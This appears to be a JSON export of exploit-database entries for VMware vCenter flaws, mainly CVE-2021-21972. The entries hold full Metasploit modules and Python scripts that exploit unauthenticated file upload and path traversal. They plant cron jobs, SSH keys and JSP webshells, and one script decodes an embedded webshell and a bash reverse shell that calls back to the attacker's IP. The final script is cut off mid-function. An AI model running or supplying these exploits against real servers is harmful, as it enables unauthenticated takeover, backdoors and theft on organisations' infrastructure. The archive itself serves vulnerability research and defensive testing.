ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'WfsDelay' => 60 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'), \n'vars_get' => { \n'_c' => '' \n} \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body == '\"FULL\"' \nreturn CheckCode::Safe('CEIP is not fully enabled.') \nend \n \nCheckCode::Appears('CEIP is fully enabled.') \nend \n \ndef exploit \nprint_status('Creating path traversal') \n \nunless write_file(rand_text_alphanumeric(8..16)) \nfail_with(Failure::NotVulnerable, 'Failed to create path traversal') \nend \n \nprint_good('Successfully created path traversal') \n \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \nprint_warning(\"Please wait up to #{wfs_delay} seconds for a session\") \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Writing system crontab: #{crontab_path}\") \n \ncrontab_file = crontab(cmd) \nvprint_line(crontab_file) \n \nunless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file) \nfail_with(Failure::PayloadFailed, 'Failed to write system crontab') \nend \n \nprint_good('Successfully wrote system crontab') \nend \n \ndef write_file(path, data = nil) \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'), \n'ctype' => 'application/json', \n'vars_get' => { \n'_c' => '', \n'_i' => \"/#{path}\" \n}, \n'data' => data \n) \n \nreturn false unless res&.code == 201 \n \ntrue \nend \n \ndef crontab(cmd) \n# https://man7.org/linux/man-pages/man5/crontab.5.html \n<<~CRONTAB.strip \n* * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/ \n* * * * * root #{cmd} \nCRONTAB \nend \n \ndef crontab_path \n\"/etc/cron.d/#{crontab_name}.json\" \nend \n \ndef crontab_name \n@crontab_name ||= rand_text_alphanumeric(8..16) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164439/vmware_vcenter_analytics_file_upload.rb.txt"}, {"lastseen": "2021-02-24T15:05:40", "description": "", "cvss3": {}, "published": "2021-02-24T00:00:00", "type": "packetstorm", "title": "VMware vCenter 6.5 / 7.0 Remote Code Execution Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-24T00:00:00", "id": "PACKETSTORM:161527", "href": "https://packetstormsecurity.com/files/161527/VMware-vCenter-6.5-7.0-Remote-Code-Execution-Proof-Of-Concept.html", "sourceData": "`#-*- coding:utf-8 -*- \nbanner = \"\"\" \n888888ba dP \n88 `8b 88 \na88aaaa8P' .d8888b. d8888P .d8888b. dP dP \n88 `8b. 88' `88 88 Y8ooooo. 88 88 \n88 .88 88. .88 88 88 88. .88 \n88888888P `88888P8 dP `88888P' `88888P' \nooooooooooooooooooooooooooooooooooooooooooooooooooooo \n@time:2021/02/24 CVE-2021-21972.py \nC0de by NebulabdSec - @batsu \n\"\"\" \nprint(banner) \n \nimport threadpool \nimport random \nimport requests \nimport argparse \nimport http.client \nimport urllib3 \n \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \nhttp.client.HTTPConnection._http_vsn = 10 \nhttp.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' \n \nTARGET_URI = \"/ui/vropspluginui/rest/services/uploadova\" \n \ndef get_ua(): \nfirst_num = random.randint(55, 62) \nthird_num = random.randint(0, 3200) \nfourth_num = random.randint(0, 140) \nos_type = [ \n'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)', \n'(Macintosh; Intel Mac OS X 10_12_6)' \n] \nchrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) \n \nua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', \n'(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] \n) \nreturn ua \n \ndef CVE_2021_21972(url): \nproxies = {\"scoks5\": \"http://127.0.0.1:1081\"} \nheaders = { \n'User-Agent': get_ua(), \n\"Content-Type\": \"application/x-www-form-urlencoded\" \n} \ntargetUrl = url + TARGET_URI \ntry: \nres = requests.get(targetUrl, \nheaders=headers, \ntimeout=15, \nverify=False, \nproxies=proxies) \n# proxies={'socks5': 'http://127.0.0.1:1081'}) \n# print(len(res.text)) \nif res.status_code == 405: \nprint(\"[+] URL:{}--------\u5b58\u5728CVE-2021-21972\u6f0f\u6d1e\".format(url)) \n# print(\"[+] Command success result: \" + res.text + \"\\n\") \nwith open(\"\u5b58\u5728\u6f0f\u6d1e\u5730\u5740.txt\", 'a') as fw: \nfw.write(url + '\\n') \nelse: \nprint(\"[-] \" + url + \" \u6ca1\u6709\u53d1\u73b0CVE-2021-21972\u6f0f\u6d1e.\\n\") \n# except Exception as e: \n# print(e) \nexcept: \nprint(\"[-] \" + url + \" Request ERROR.\\n\") \ndef multithreading(filename, pools=5): \nworks = [] \nwith open(filename, \"r\") as f: \nfor i in f: \nfunc_params = [i.rstrip(\"\\n\")] \n# func_params = [i] + [cmd] \nworks.append((func_params, None)) \npool = threadpool.ThreadPool(pools) \nreqs = threadpool.makeRequests(CVE_2021_21972, works) \n[pool.putRequest(req) for req in reqs] \npool.wait() \n \ndef main(): \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \n\"--url\", \nhelp=\"Target URL; Example:http://ip:port\") \nparser.add_argument(\"-f\", \n\"--file\", \nhelp=\"Url File; Example:url.txt\") \n# parser.add_argument(\"-c\", \"--cmd\", help=\"Commands to be executed; \") \nargs = parser.parse_args() \nurl = args.url \n# cmd = args.cmd \nfile_path = args.file \nif url != None and file_path ==None: \nCVE_2021_21972(url) \nelif url == None and file_path != None: \nmultithreading(file_path, 10) # \u9ed8\u8ba415\u7ebf\u7a0b \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161527/CVE-2021-21972.py.txt"}, {"lastseen": "2021-03-08T16:24:36", "description": "", "cvss3": {}, "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server File Upload / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161695", "href": "https://packetstormsecurity.com/files/161695/VMware-vCenter-Server-File-Upload-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \n# \"Shotgun\" approach to writing JSP \nRank = ManualRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE', \n'Description' => %q{ \nThis module exploits an unauthenticated OVA file upload and path \ntraversal in VMware vCenter Server to write a JSP payload to a \nweb-accessible directory. \n \nFixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. \nNote that later vulnerable versions of the Linux appliance aren't \nexploitable via the webshell technique. Furthermore, writing an SSH \npublic key to /home/vsphere-ui/.ssh/authorized_keys works, but the \nuser's non-existent password expires 90 days after install, rendering \nthe technique nearly useless against production environments. \n \nYou'll have the best luck targeting older versions of the Linux \nappliance. The Windows target should work ubiquitously. \n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu', # Analysis and exploit \n'mr_me', # Co-conspirator \n'Viss' # Co-conspirator \n], \n'References' => [ \n['CVE', '2021-21972'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'], \n['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'], \n['URL', 'https://twitter.com/jas502n/status/1364810720261496843'], \n['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'], \n['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'], \n['URL', 'https://kb.vmware.com/s/article/2143838'], \n['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html'] \n], \n'DisclosureDate' => '2021-02-23', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'win'], \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true on Windows \n'Targets' => [ \n[ \n# TODO: /home/vsphere-ui/.ssh/authorized_keys \n'VMware vCenter Server <= 6.7 Update 1b (Linux)', \n{ \n'Platform' => 'linux' \n} \n], \n[ \n'VMware vCenter Server <= 6.7 Update 3j (Windows)', \n{ \n'Platform' => 'win' \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp', \n'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], \n'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint'] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \n# /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index> \nOptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me \nOptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu \n]) \nend \n \ndef spray_and_pray_min \ndatastore['SprayAndPrayMin'] \nend \n \ndef spray_and_pray_max \ndatastore['SprayAndPrayMax'] \nend \n \ndef spray_and_pray_range \n(spray_and_pray_min..spray_and_pray_max).to_a \nend \n \ndef check \n# Run auxiliary/scanner/vmware/esx_fingerprint \nsuper \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \ncase res.code \nwhen 200 \n# {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"} \nexpected_keys = [ \n'States', \n'Install Progress', \n'Install Final Progress', \n'Config Progress', \n'Config Final Progress' \n] \n \nif (expected_keys & res.get_json_document.keys) == expected_keys \nreturn CheckCode::Vulnerable('Unauthenticated endpoint access granted.') \nend \n \nCheckCode::Detected('Target did not respond with expected keys.') \nwhen 401 \nCheckCode::Safe('Unauthenticated endpoint access denied.') \nelse \nCheckCode::Detected(\"Target responded with code #{res.code}.\") \nend \nend \n \ndef exploit \nupload_ova \npop_thy_shell # ;) \nend \n \ndef upload_ova \nprint_status(\"Uploading OVA file: #{ova_filename}\") \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \ngenerate_ova, \n'application/x-tar', # OVA is tar \n'binary', \n%(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'), \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res && res.code == 200 && res.body == 'SUCCESS' \nfail_with(Failure::NotVulnerable, 'Failed to upload OVA file') \nend \n \nregister_files_for_cleanup(*jsp_paths) \n \nprint_good('Successfully uploaded OVA file') \nend \n \ndef pop_thy_shell \njsp_uri = \ncase target['Platform'] \nwhen 'linux' \nnormalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\") \nwhen 'win' \nnormalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\") \nend \n \nprint_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\") \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri \n) \n \nunless res && res.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to request JSP payload') \nend \n \nprint_good('Successfully requested JSP payload') \nend \n \ndef generate_ova \nova_file = StringIO.new \n \n# HACK: Spray JSP in the OVA and pray we get a shell... \nRex::Tar::Writer.new(ova_file) do |tar| \njsp_paths.each do |path| \n# /tmp/unicorn_ova_dir/../../<path> \ntar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) } \nend \nend \n \nova_file.string \nend \n \ndef jsp_paths \ncase target['Platform'] \nwhen 'linux' \n@jsp_paths ||= spray_and_pray_range.shuffle.map do |idx| \n\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\" \nend \nwhen 'win' \n# Forward slashes work here \n[\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"] \nend \nend \n \ndef ova_filename \n@ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\" \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\" \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161695/vmware_vcenter_uploadova_rce.rb.txt"}, {"lastseen": "2021-03-01T16:09:17", "description": "", "cvss3": {}, "published": "2021-03-01T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 7.0 Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "PACKETSTORM:161590", "href": "https://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html", "sourceData": "`# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload \n# Date: 2021-02-27 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html \n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) \n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds \n# CVE: CVE-2021-21972 \n \n#!/usr/bin/env python3 \n''' \nCopyright 2021 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-21972.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nCVE-2021-21972 is an unauthenticated file upload and overwrite, \nexploitation can be done via SSH public key upload or a webshell \nThe webshell must be of type JSP, and its success depends heavily on the specific vCenter version \n \n# Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister \n# A white page means vulnerable \n# A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) \n# Notes: \n# * On Linux SSH key upload is always best, when SSH access is possible & enabled \n# * On Linux the upload is done as user vsphere-ui:users \n# * On Windows the upload is done as system user \n# * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\" \n# * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: vulnerability checker + exploit \n''' \n \nimport os, tarfile, sys, optparse, requests \nrequests.packages.urllib3.disable_warnings() \n \nlProxy = {} \nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> \n<env:Body> \n<RetrieveServiceContent xmlns=\"urn:vim25\"> \n<_this type=\"ServiceInstance\">ServiceInstance</_this> \n</RetrieveServiceContent> \n</env:Body> \n</env:Envelope>''' \nsURL = sFile = sRpath = sType = None \n \ndef parseArguments(options): \nglobal sURL, sFile, sType, sRpath, lProxy \nif not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') \nsURL = options.url \nif sURL[-1:] == '/': sURL = sURL[:-1] \nif not sURL[:4].lower() == 'http': sURL = 'https://' + sURL \nsFile = options.file \nif not os.path.exists(sFile): exit('[-] File not found: ' + sFile) \nsType = 'ssh' \nif options.type: sType = options.type \nif options.rpath: sRpath = options.rpath \nelse: sRpath = None \nif options.proxy: lProxy = {'https': options.proxy} \n \ndef getVersion(sURL): \ndef getValue(sResponse, sTag = 'vendor'): \ntry: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] \nexcept: pass \nreturn '' \noResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) \n#print(oResponse.text) \nif oResponse.status_code == 200: \nsResult = oResponse.text \nif not 'VMware' in getValue(sResult, 'vendor'): \nexit('[-] Not a VMware system: ' + sURL) \nelse: \nsName = getValue(sResult, 'name') \nsVersion = getValue(sResult, 'version') # e.g. 7.0.0 \nsBuild = getValue(sResult, 'build') # e.g. 15934073 \nsFull = getValue(sResult, 'fullName') \nprint('[+] Identified: ' + sFull) \nreturn sVersion, sBuild \nexit('[-] Not a VMware system: ' + sURL) \n \ndef verify(sURL): \n#return True \nsURL += '/ui/vropspluginui/rest/services/uploadova' \ntry: \noResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) \nexcept: \nexit('[-] System not available: ' + sURL) \nif oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely \nelse: return False \n \ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): \ndef getResourcePath(): \noResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) \nreturn oResponse.text.split('static/')[1].split('/')[0] \noTar = tarfile.open('payloadLin.tar','w') \nif sRpath: ## version & build not important \nif sRpath[0] == '/': sRpath = sRpath[1:] \nsPayloadPath = '../../' + sRpath \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'absolute' \nelif sType.lower() == 'ssh': ## version & build not important \nsPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'ssh' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): \n## vCenter 6.5/6.7 < 13010631, just this location with a subnumber \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \nfor i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) \noTar.close() \nreturn 'webshell' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): \n## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile> \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \nelse: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): \n## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>) \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \n \n \ndef createTarWin(sFile, sRpath = None): \n## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows \nif sRpath: \nif sRpath[0] == '/': sRpath = sRpath[:1] \nsPayloadPath = '../../' + sRpath \nelse: \nsPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) \noTar = tarfile.open('payloadWin.tar','w') \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \n \ndef uploadFile(sURL, sUploadType, sFile): \n#print('[!] Uploading ' + sFile) \nsFile = os.path.basename(sFile) \nsUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' \narrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} \n## Linux \noResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Linux payload uploaded succesfully.') \nif sUploadType == 'ssh': \nprint('[+] SSH key installed for user \\'vsphere-ui\\'.') \nprint(' Please run \\'ssh vsphere-ui@' + sURL.replace('https://','') + '\\'') \nreturn True \nelif sUploadType == 'webshell': \nsWebshell = sURL + '/ui/resources/' + sFile \n#print('testing ' + sWebshell) \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nelif sUploadType == 'backdoor': \nsWebshell = sURL + '/ui/resources/' + sFile \nprint('[+] Backdoor ready, please reboot or wait for a reboot') \nprint(' then open: ' + sWebshell) \nelse: ## absolute \npass \n## Windows \narrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} \noResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Windows payload uploaded succesfully.') \nif sUploadType == 'backdoor': \nprint('[+] Absolute upload looks OK') \nreturn True \nelse: \nsWebshell = sURL + '/statsreport/' + sFile \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nreturn False \n \nif __name__ == \"__main__\": \nusage = ( \n'Usage: %prog [option]\\n' \n'Exploiting Windows & Linux vCenter Server\\n' \n'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n' \n'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n' \n'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') \nparser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') \nparser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') \nparser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') \n \n(options, args) = parser.parse_args() \n \nparseArguments(options) \n \n## Verify \nif verify(sURL): print('[+] Target vulnerable: ' + sURL) \nelse: exit('[-] Target not vulnerable: ' + sURL) \n \n## Read out the version \nsVersion, sBuild = getVersion(sURL) \nif sRpath: print('[!] Ready to upload your file to ' + sRpath) \nelif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'') \nelse: print('[!] Ready to upload webshell \\'' + sFile + '\\'') \nsAns = input('[?] Want to exploit? [y/N]: ') \nif not sAns or not sAns[0].lower() == 'y': exit() \n \n## Create TAR file \nsUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) \nif not sUploadType == 'ssh': createTarWin(sFile, sRpath) \n \n## Upload and verify \nuploadFile(sURL, sUploadType, sFile) \n \n## Cleanup \nos.remove('payloadLin.tar') \nos.remove('payloadWin.tar') \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161590/vmwarevcenterserver70-upload.txt"}, {"lastseen": "2021-06-24T18:30:50", "description": "", "cvss3": {}, "published": "2021-06-24T00:00:00", "type": "packetstorm", "title": "VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-24T00:00:00", "id": "PACKETSTORM:163268", "href": "https://packetstormsecurity.com/files/163268/VMware-vCenter-6.5-6.7-7.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) \n# Date: 06/21/2021 \n# Exploit Author: CHackA0101 \n# Vendor Homepage: https://kb.vmware.com/s/article/82374 \n# Software Link: https://www.vmware.com/products/vcenter-server.html \n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). \n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux) \n# CVE: 2021-21972 \n \n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md \n \n#!/usr/bin/python2 \n \nimport os \nimport urllib3 \nimport argparse \nimport sys \nimport requests \nimport base64 \nimport tarfile \nimport threading \nimport time \n \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \nmyargs=argparse.ArgumentParser() \nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True) \nmyargs.add_argument('-L','--local',help='Your local IP',required=True) \nargs=myargs.parse_args() \n \ndef getprompt(x): \nprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n \ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"): \nfullpath=\"../\" * 7 + path \nreturn fullpath.replace('\\\\','/').replace('//','/') \n \ndef createbackdoor(localip): \n# shell4.jsp \nbackdoor = \"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\" \nbackdoor = base64.b64decode(backdoor).decode('utf-8') \nf = open(\"shell4.jsp\",\"w\") \nf.write(backdoor) \nf.close() \n# reverse.sh \n# After decoding overwrite string 'CUSTOM_IP' for local IP \nshell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\" \nshell=base64.b64decode(shell).decode('utf-8') \nshell=shell.replace('CUSTOM_IP',localip) \nf=open(\"reverse.sh\",\"w\") \nf.write(shell) \nf.close() \n# Move on with the payload 